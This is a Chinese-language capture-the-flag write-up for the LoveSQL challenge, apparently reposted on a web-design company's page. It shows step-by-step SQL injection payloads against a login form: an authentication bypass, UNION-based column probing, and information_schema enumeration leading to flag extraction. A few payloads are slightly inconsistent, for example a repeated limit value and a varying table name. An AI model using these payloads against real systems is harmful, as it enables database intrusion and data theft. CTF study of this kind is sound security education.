☰
[极客大挑战 2019]LoveSQL_CTF2
2026/9/28 21:16:53 网站建设 项目流程

靶场环境:用户登陆

页面展示:

解题过程:

步骤一:

进入靶场后看见用户名和密码框,用户名输入1' or 1=1#,密码输入1

成功登录,回显:

尝试提交CTF2{c8bffd77808d7e311653f36a7907de3a}和c8bffd77808d7e311653f36a7907de3a都失败了,说明这不是flag。

步骤二:

通过' UNION SELECT 1,2,3#尝试出有三列,而第二列会回显,故构造' UNION SELECT 1,database(),3#来获取当前数据库名(database()是内置函数,用于获取当前数据库名)

步骤三:

构造获取数据库表名的payload。

Payload1:

' union select 1,(select table_name from information_schema.tables where table_schema='geek' limit 0,1),3#

返回第一个表名为 geekuser。

Payload2:

' union select 1,(select table_name from information_schema.tables where table_schema='geek' limit 1,1),3#

返回第二个表名为 I0ve1ysq1。

Payload3:

' union select 1,(select table_name from information_schema.tables where table_schema='geek' limit 2,1),3#

未返回表名。

所以现在我们知道了geek库里有两个表,表名分别是geekuser和l0ve1ysq1。

步骤四:

接下来我们尝试从表中获取列名,构造获取特定表的列名的payload。

' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='geekuser' limit 0,1),3# >id ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='geekuser' limit 1,1),3# >username ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='geekuser' limit 1,1),3# >password ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' limit 0,1),3# >id ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' limit 1,1),3# >username ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' limit 2,1),3# >password

以上payload是我列举的六个,上面三个查询geekuser表,下三个查询l0ve1ysq1表,分别返回参数 id, username, password。 我们通过更改limit n, 1 (n=0,1,2,3,4,5,6,7,8......)挨个表查里面的数据,经过一番紧张刺激的查询,成功在l0ve1ysq1表的password列的第16个字段里找到了flag。
payload:'union select 1,(select password from l0ve1ysq1 limit 15,1),3#

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询